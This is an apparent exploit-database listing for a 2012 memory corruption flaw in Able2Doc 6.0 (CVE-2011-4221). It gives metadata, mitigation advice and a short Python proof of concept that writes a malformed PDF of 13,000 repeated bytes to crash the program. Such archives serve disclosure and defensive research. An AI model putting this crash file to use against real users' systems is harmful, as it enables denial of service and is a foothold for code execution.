header-logo
Suggest Exploit
vendor:
Able2Doc
by:
Carlos Mario Penagos Hollmann
7.5
CVSS
HIGH
Memory Corruption
119
CWE
Product Name: Able2Doc
Affected Version From: 6
Affected Version To: 6
Patch Exists: NO
Related CWE: CVE-2011-4221
CPE: a:investintech:able2doc:6.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 7
2012

Able2Doc and Able2Doc Professional v 6.0 memory corruption

The exploit creates a malicious PDF file that triggers a memory corruption vulnerability in Able2Doc and Able2Doc Professional version 6.0. By opening the specially crafted PDF file, an attacker can corrupt the memory of the application, leading to potential code execution or system instability.

Mitigation:

To mitigate this vulnerability, users are advised to update to the latest version of Able2Doc or Able2Doc Professional. Additionally, exercise caution when opening PDF files from untrusted sources.
Source

Exploit-DB raw data:

# Exploit Title: Able2Doc and Able2Doc Professional v 6.0 memory corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4221


payload ="B"*13000
crash="startxref"
pdf=payload+crash

filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()

Navigation

Suggest Exploit

Services By CQR

cqrsecured